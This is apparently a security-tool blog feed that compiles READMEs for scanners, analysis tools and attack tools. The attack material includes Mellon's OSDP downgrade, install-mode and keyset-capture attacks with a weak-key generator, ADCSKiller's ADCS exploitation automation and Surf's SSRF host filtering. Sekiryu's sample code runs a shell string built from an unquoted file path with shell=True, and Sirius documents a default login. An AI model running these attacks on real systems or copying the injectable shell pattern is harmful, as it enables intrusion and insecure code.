Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt
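
For context, the kind of DNS lookups behind these checks can be reproduced with a few lines of dnspython. This is an illustrative sketch, not Spoofy's own implementation:

# illustrative SPF/DMARC record lookup with dnspython (not Spoofy's own code)
import dns.resolver  # pip install dnspython

def txt_records(name):
    try:
        return [r.to_text().strip('"') for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        return []

domain = "example.com"
spf = [t for t in txt_records(domain) if t.startswith("v=spf1")]
dmarc = [t for t in txt_records("_dmarc." + domain) if t.startswith("v=DMARC1")]
print("SPF:", spf or "none")
print("DMARC:", dmarc or "none")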

HOW DO YOU KNOW IT'S SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing whether an SPF and DMARC combination was spoofable was done using the email security pentesting suite at emailspooftest, using Microsoft 365. The initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



Sirius - First Truly Open-Source General Purpose Vulnerability Scanner

By: Zion3R


Sirius is the first truly open-source general purpose vulnerability scanner. Today, the information security community remains the best and most expedient source for cybersecurity intelligence. The community itself regularly outperforms commercial vendors. This is the primary advantage Sirius Scan intends to leverage.

The framework is built around four general vulnerability identification concepts: the vulnerability database, network vulnerability scanning, agent-based discovery, and custom assessor analysis. With these powers combined around an easy-to-use interface, Sirius hopes to enable industry evolution.


Getting Started

To run Sirius clone this repository and invoke the containers with docker-compose. Note that both docker and docker-compose must be installed to do this.

git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker-compose up

Logging in

The default username and password for Sirius is: admin/sirius

Services

The system is composed of the following services:

  • Mongo: a NoSQL database used to store data.
  • RabbitMQ: a message broker used to manage communication between services.
  • Sirius API: the API service which provides access to the data stored in Mongo.
  • Sirius Web: the web UI which allows users to view and manage their data pipelines.
  • Sirius Engine: the engine service which manages the execution of data pipelines.

Usage

To use Sirius, first start all of the services by running docker-compose up. Then, access the web UI at localhost:5173.

Remote Scanner

If you would like to set up Sirius Scan on a remote machine and access it, you must modify the ./UI/config.json file to include your server details.

Good Luck! Have Fun! Happy Hacking!



DakshSCRA - Source Code Review Assist

By: Zion3R


The Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


Debut

Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

Features and Functionalities

Distinctive Features (Multiple World’s First)

  • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

  • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

  • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

  • Automated Scientific Effort Estimation for Code Review (World’s First): Providing a measurable approach for estimating efforts required for a code review process.

Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

Additionally, the tool offers the following functionalities:

  • Options to use platform-specific rules for finding areas of interest
  • Options to extend or add new rules for any new or existing languages
  • Generates reports in text, HTML and PDF formats for inspection

Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

Feel free to contribute towards updating or adding new rules and future development.

If you find any bugs, report them to d3basis.m0hanty@gmail.com.

Tool Setup

Pre-requisites

Python3 and all the libraries listed in requirements.txt

Setting up environment to run this tool

1. Setup a virtual environment

$ pip install virtualenv

$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv

$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate

After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

2. Ensure all required libraries are installed within the virtual environment

You must run the below command after activating the virtual environment as mentioned in the previous steps.

pip install -r requirements.txt

Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

Tool Usage

$ python3 dakshscra.py -h // To view available options and arguments

usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review

Example Usage

$ python3 dakshscra.py // To view tool usage along with examples

Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshscra.py -r php -t /source_dir_path

# To override default settings, other filetypes can be specified with the '-f' option.
dakshscra.py -r php -f dotnet -t /path_to_source_dir
dakshscra.py -r php -f custom -t /path_to_source_dir

# Perform reconnaissance and rule-based scanning if '-recon' is used with the '-r' option.
dakshscra.py -recon -r php -t /path_to_source_dir

# Perform only reconnaissance if '-recon' is used without the '-r' option.
dakshscra.py -recon -t /path_to_source_dir

# Verbosity: '-v' is default, '-vvv' will display all rule checks within each rule category.
dakshscra.py -r php -vv -t /path_to_source_dir


Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TYPES: dotnet, php, java, custom, allfiles

Reports

The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

Scanning (Areas of Security Concerns) Report

HTML Report:
  • DakshSCRA/reports/html/report.html
PDF Report:
  • DakshSCRA/reports/html/report.pdf
RAW TEXT Based Reports:
  • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
  • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
  • Identified Project Files: DakshSCRA/runtime/filepaths.txt

Reconnaissance (Recon) Report

  • Reconnaissance Summary: /reports/text/recon.txt

Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

Code Review Effort Estimation Report

  • Effort estimation report: /reports/html/estimation.html

Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



Mellon - OSDP Attack Tool

By: Zion3R


OSDP attack tool (and the Elvish word for friend)

Attack #1: Encryption is Optional

OSDP supports, but doesn't strictly require, encryption. So your connection might not even be encrypted at all. Attack #1 is just to passively listen and see if you can read the card numbers on the wire.

Attack #2: Downgrade Attack

Just because the controller and reader support encryption doesn't mean they're configured to require it be used. An attacker can modify the reader's capability reply message (osdp_PDCAP) to advertise that it doesn't support encryption. When this happens, some controllers will barrel ahead without encryption.

Attack #3: Install-mode Attack

OSDP has a quasi-official “install mode” that applies to both readers and controllers. As the name suggests, it’s supposed to be used when first setting up a reader. It essentially allows readers to ask the controller for the base encryption key (the SCBK). If the controller is configured to be persistently in install mode, then an attacker can show up on the wire and request the SCBK.

Attack #4: Weak Keys

OSDP sample code often comes with hardcoded encryption keys. Clearly these are meant to be samples, where the user is supposed to generate keys in a secure way on their own. But this is not explained or made simple for the user. And anyone who’s been in security long enough knows that whatever’s the default is likely to be there in production.

So as an attack vector, when the link between reader and controller is encrypted, it’s worth a shot to enumerate some common weak keys. Now these are 128-bit AES keys, so we’re not going to be able to enumerate them all, or even a meaningful portion of them. But what we can do is hit some common patterns that you see when someone hardcodes a key (a small generator sketch follows the list):

  • All single-byte values. [0x04, 0x04, 0x04, 0x04 …]
  • All monotonically increasing byte values. [0x01, 0x02, 0x03, 0x04, …]
  • All monotonically decreasing byte values. [0x0A, 0x09, 0x08, 0x07, …]
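
A small Python generator for exactly those candidate patterns might look like this (an illustrative sketch, not Mellon's actual code):

# enumerate the weak 128-bit AES key patterns described above (illustrative sketch)
def weak_keys():
    for b in range(256):                    # all single-byte values
        yield bytes([b] * 16)
    for start in range(256):                # monotonically increasing byte values
        yield bytes((start + i) % 256 for i in range(16))
    for start in range(256):                # monotonically decreasing byte values
        yield bytes((start - i) % 256 for i in range(16))

print(sum(1 for _ in weak_keys()), "candidate keys")  # 768 candidates in total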

Attack #5: Keyset Capture

OSDP has no in-band mechanism for key exchange. What this means is that an attacker can:

  • Insert a covert listening device onto the wire.
  • Break / factory reset / disable the reader.
  • Wait for someone from IT to come and replace the reader.
  • Capture the keyset message (osdp_KEYSET) when the reader is first setup.
  • Decrypt all future messages.

Getting A Testbed Setup (Linux/MacOS)

You'll find proof-of-concept code for each of these attacks in attack_osdp.py. Check out the --help output for more details on usage. This is a Python script, meant to be run from a laptop with USB<-->RS485 adapters like one of these. So you'll probably want to pick some of those up. It doesn't have to be that model, though.

If you have a controller you want to test, then great. Use that. If you don't, then we have an intentionally-vulnerable OSDP controller that you can use here: vulnserver.py.

Some of the attacks in attack_osdp.py will expect to be run as a full MitM between a functioning reader and controller. To test these, you might need three USB<-->RS485 adapters, hooked together with a breadboard.

Additional Medium / Low Risk Issues

These issues are not, in isolation, exploitable but nonetheless represent a weakening of the protocol, implementation, or overall system.

  • MACs are truncated to 32 bits "to reduce overhead". This is very nearly (but not quite in our calculation) within practical exploitable range.
  • IVs (which are derived from MACs) are similarly reduced to 32 bits of entropy. This will cause IV reuse, which is a big red flag for a protocol.
  • Session keys are only generated using 48 bits of entropy from the controller RNG nonce. This appears to not be possible for an observing attacker to enumerate offline, however. (Unless we're missing something, in which case this would become a critical issue.)
  • Sequence numbers consist of only 2 bits, not providing sufficient liveness.
  • CBC-mode encryption is used. GCM would be a more modern block cipher mode appropriate for network protocols.
  • SCS modes 15 & 16 are essentially "null ciphers", and should not exist. They don't encrypt data.
  • The OSDP command byte is always unencrypted, even in the middle of a Secure Channel session. This is a huge benefit to attackers, making attack tools much easier to write. It means that an attacker can always see what "type" of packet is being sent, even if it's otherwise encrypted. Attackers can tell when people badge in, when the LED lights up, etc... This is not information that should be in plaintext.
  • SCBK-D (a hardcoded "default" encryption key) provides no security and should be removed. It serves only to obfuscate and provide a false sense of security.


Sekiryu - Comprehensive Toolkit For Ghidra Headless

By: Zion3R


This Ghidra Toolkit is a comprehensive suite of tools designed to streamline and automate various tasks associated with running Ghidra in Headless mode. This toolkit provides a wide range of scripts that can be executed both inside and alongside Ghidra, enabling users to perform tasks such as Vulnerability Hunting, Pseudo-code Commenting with ChatGPT and Reporting with Data Visualization on the analyzed codebase. It allows users to load and save their own scripts and interact with the script's built-in API.


Key Features

  • Headless Mode Automation: The toolkit enables users to seamlessly launch and run Ghidra in Headless mode, allowing for automated and batch processing of code analysis tasks.

  • Script Repository/Management: The toolkit includes a repository of pre-built scripts that can be executed within Ghidra. These scripts cover a variety of functionalities, empowering users to perform diverse analysis and manipulation tasks. It allows users to load and save their own scripts, providing flexibility and customization options for their specific analysis requirements. Users can easily manage and organize their script collection.

  • Flexible Input Options: Users can utilize the toolkit to analyze individual files or entire folders containing multiple files. This flexibility enables efficient analysis of both small-scale and large-scale codebases.

Available scripts

  • Vulnerability Hunting with pattern recognition: Leverage the toolkit's scripts to identify potential vulnerabilities within the codebase being analyzed. This helps security researchers and developers uncover security weaknesses and proactively address them.
  • Vulnerability Hunting with SemGrep: Thanks to security researcher 0xdea and the rule-set they created, we can use simple rules and SemGrep to detect vulnerabilities in C/C++ pseudo code (their GitHub: https://github.com/0xdea/semgrep-rules)
  • Automatic Pseudo Code Generating: Automatically generate pseudo code within Ghidra's Headless mode. This feature assists in understanding and documenting the code logic without manual intervention.
  • Pseudo-code Commenting with ChatGPT: Enhance the readability and understanding of the codebase by utilizing ChatGPT to generate human-like comments for pseudo-code snippets. This feature assists in documenting and explaining the code logic.
  • Reporting and Data Visualization: Generate comprehensive reports with visualizations to summarize and present the analysis results effectively. The toolkit provides data visualization capabilities to aid in identifying patterns, dependencies, and anomalies in the codebase.

Pre-requisites

Before using this project, make sure you have the following software installed:

Installation

  • Install the pre-requisites mentioned above.
  • Download Sekiryu release directly from Github or use: pip install sekiryu.

Usage

In order to use the script you can simply run it against a binary with the options that you want to execute.

  • sekiryu [-F FILE][OPTIONS]

Please note that performing a binary analysis with Ghidra (or any other product) is a relatively slow process. Thus, expect the binary analysis to take several minutes depending on host performance. If you run Sekiryu against a very large application or a large number of binary files, be prepared to WAIT.

Demos

API

In order to use the API, the user must import xmlrpc in their script and call the functions through the proxy, for example: proxy.send_data() (a minimal client sketch follows the function list).

Functions

  • send_data() - Allows the user to send data to the server ("data" is a dictionary).
  • recv_data() - Allows the user to receive data from the server ("data" is a dictionary).
  • request_GPT() - Allows the user to send string data via the ChatGPT API.
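
A minimal client sketch is shown below; the server address and port are placeholder assumptions, not documented Sekiryu defaults:

# minimal XML-RPC client sketch; the URL and port are assumptions, not Sekiryu defaults
import xmlrpc.client

proxy = xmlrpc.client.ServerProxy("http://127.0.0.1:8000")  # hypothetical endpoint
proxy.send_data({"task": "example", "payload": "hello"})    # "data" is a dictionary
print(proxy.recv_data())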

Use your own scripts

Scripts are saved in the folder /modules/scripts/; you can simply copy your script there. In the ghidra_pilot.py file you can find the following function, which is responsible for running a headless Ghidra script:

def exec_headless(file, script):
    """
    Execute the headless analysis of ghidra
    """
    path = ghidra_path + 'analyzeHeadless'
    # Setting variables
    tmp_folder = "/tmp/out"
    os.mkdir(tmp_folder)
    cmd = ' ' + tmp_folder + ' TMP_DIR -import' + ' ' + file + ' ' + "-postscript " + script + " -deleteProject"

    # Running ghidra with specified file and script
    try:
        p = subprocess.run([str(path + cmd)], shell=True, capture_output=True)
        os.rmdir(tmp_folder)

    except KeyError as e:
        print(e)
        os.rmdir(tmp_folder)

The usage is pretty straightforward: you can create your own script and then just add a function in ghidra_pilot.py such as:

def yourfunction(file):
    try:
        # Setting script
        script = "modules/scripts/your_script.py"

        # Start the exec_headless function in a new thread
        thread = threading.Thread(target=exec_headless, args=(file, script))
        thread.start()
        thread.join()
    except Exception as e:
        print(str(e))

The file cli.py is responsible for the command-line interface and allows you to add arguments and their associated commands like this:

analysis_parser.add_argument('[-ShortCMD]', '[--LongCMD]', help="Your Help Message", action="store_true")

Contributions

  • Scripts/SCRIPTS/SCRIIIIIPTS: This tool is designed to be a toolkit allowing users to save and run their own scripts easily. Obviously, if you can contribute any sort of script, anything that is interesting will be approved!
  • Optimization: Any kind of optimization is welcome and will almost automatically be approved and deployed every release; some nice things could be improved parallel tasking, code cleaning and overall improvement.
  • Malware analysis: It's a big part, which I'm not familiar with. Any malware analyst willing to contribute can suggest ideas, scripts, or even commit code directly to the project.
  • Reporting: I ain't no data visualization engineer; if anyone is willing to improve/contribute on this part, it'll be very nice.

Warning

The xmlrpc.server module is not secure against maliciously constructed data. If you need to parse 
untrusted or unauthenticated data see XML vulnerabilities.

Special thanks

A lot of people encouraged me to push further on this tool and improve it. Without you all this project wouldn't have been
the same so it's time for a proper shout-out:
- @JeanBedoul @McProustinet @MilCashh @Aspeak @mrjay @Esbee|sandboxescaper @Rosen @Cyb3rops @RussianPanda @Dr4k0nia
- @Inversecos @Vs1m @djinn @corelanc0d3r @ramishaath @chompie1337
Thanks for your feedback, support, encouragement, test, ideas, time and care.

For more information about Bushido Security, please visit our website: https://www.bushido-sec.com/.



Callisto - An Intelligent Binary Vulnerability Analysis Tool

By: Zion3R


Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the pseudo code output looking for potential security vulnerabilities in that pseudo C code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.
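
For example, feeding output.c into Semgrep from Python can be sketched as follows; the rules path is an assumption pointing at a local checkout of the semgrep-rules project mentioned below, not something bundled with Callisto:

# sketch: run Semgrep over the extracted pseudo code yourself
# (the rules path is an example local checkout, not bundled with Callisto)
import subprocess

result = subprocess.run(
    ["semgrep", "--config", "path/to/semgrep-rules/c", "output.c"],
    capture_output=True,
    text=True,
)
print(result.stdout)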

I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

Requirements:

  • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save to the config.txt file in this folder
  • Ghidra
  • Semgrep - pip install semgrep
  • requirements.txt - pip install -r requirements.txt
  • Ensure the correct path to your Ghidra directory is set in the config.txt file

To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

  • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
  • -o => define an output file, if you want to save the output
  • -ai and -o are optional parameters
  • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
  • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
  • Ex. (Running all functions through AI Analysis):
    python callisto.py -b vulnProgram.exe -ai -all -o results.txt

Program Output Example:



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending an HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.


Installation

This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

███████╗██╗ ██╗██████╗ ███████╗
██╔════╝██║ ██║██╔══██╗██╔════╝
███████╗██║ ██║██████╔╝█████╗
╚════██║██║ ██║██╔══██╗██╔══╝
███████║╚██████╔╝██║ ██║██║
╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit

Output

When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is run from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



ADCSKiller - An ADCS Exploitation Automation Tool Weaponizing Certipy And Coercer

By: Zion3R

ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that ADCSKiller is currently in its first drafts and will undergo further refinements and additions in future updates.


Features

  • Enumerate Domain Administrators via LDAP
  • Enumerate Domain Controllers via LDAP
  • Enumerate Certificate Authorities via Certipy
  • Exploitation of ESC1
  • Exploitation of ESC8

Installation

Since this tool relies on Certipy and Coercer, both tools have to be installed first.

git clone https://github.com/ly4k/Certipy && cd Certipy && python3 setup.py install
git clone https://github.com/p0dalirius/Coercer && cd Coercer && pip install -r requirements.txt && python3 setup.py install
git clone https://github.com/grimlockx/ADCSKiller/ && cd ADCSKiller && pip install -r requirements.txt

Usage

Usage: adcskiller.py [-h] -d DOMAIN -u USERNAME -p PASSWORD -t TARGET -l LEVEL -L LHOST

Options:
-h, --help Show this help message and exit.
-d DOMAIN, --domain DOMAIN
Target domain name. Use FQDN
-u USERNAME, --username USERNAME
Username.
-p PASSWORD, --password PASSWORD
Password.
-dc-ip TARGET, --target TARGET
IP Address of the domain controller.
-L LHOST, --lhost LHOST
FQDN of the listener machine - An ADIDNS is probably required

Todos

  • Tests, Tests, Tests
  • Enumerate principals which are allowed to dcsync
  • Use dirkjanm's gettgtpkinit.py to receive a ticket instead of Certipy auth
  • Support DC Certificate Authorities
  • ESC2 - ESC7
  • ESC9 - ESC11?
  • Automatically add an ADIDNS entry if required
  • Support DCSync functionality

Credits



NucleiFuzzer - Powerful Automation Tool For Detecting XSS, SQLi, SSRF, Open-Redirect, Etc.. Vulnerabilities In Web Applications

By: Zion3R

NucleiFuzzer is an automation tool that combines ParamSpider and Nuclei to enhance web application security testing. It uses ParamSpider to identify potential entry points and Nuclei's templates to scan for vulnerabilities. NucleiFuzzer streamlines the process, making it easier for security professionals and web developers to detect and address security risks efficiently. Download NucleiFuzzer to protect your web applications from vulnerabilities and attacks.

Note: Nuclei + Paramspider = NucleiFuzzer

Tools included:

ParamSpider git clone https://github.com/0xKayala/ParamSpider.git

Nuclei git clone https://github.com/projectdiscovery/nuclei.git

Templates:

Fuzzing Templates git clone https://github.com/projectdiscovery/fuzzing-templates.git

Output



Usage

nucleifuzzer -h

This will display help for the tool. Here are the options it supports.

NucleiFuzzer is a Powerful Automation tool for detecting XSS, SQLi, SSRF, Open-Redirect, etc. vulnerabilities in Web Applications

Usage: /usr/local/bin/nucleifuzzer [options]

Options:
-h, --help Display help information
-d, --domain <domain> Domain to scan for XSS, SQLi, SSRF, Open-Redirect..etc vulnerabilities

Steps to Install:

  1. git clone https://github.com/0xKayala/NucleiFuzzer.git
  2. cd NucleiFuzzer
  3. sudo chmod +x install.sh
  4. ./install.sh
  5. nucleifuzzer -h

Made by Satya Prakash | 0xKayala

A Security Researcher and Bug Hunter


VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.
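
As an illustration of this hash-based flow, the sketch below hashes a file and asks the VirusTotal v3 API whether a report already exists; it is a minimal example, not VTScanner's actual implementation:

# hash a file and query VirusTotal v3 for an existing report (illustrative sketch)
import hashlib
import requests

API_KEY = "YOUR_VT_API_KEY"  # VTScanner reads its key from config.ini

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

file_hash = sha256_of("suspect.bin")
resp = requests.get(
    "https://www.virustotal.com/api/v3/files/" + file_hash,
    headers={"x-apikey": API_KEY},
)
if resp.status_code == 404:
    print("Hash not known to VirusTotal; the file must be submitted for analysis")
else:
    stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
    print("Malicious detections:", stats["malicious"])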

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
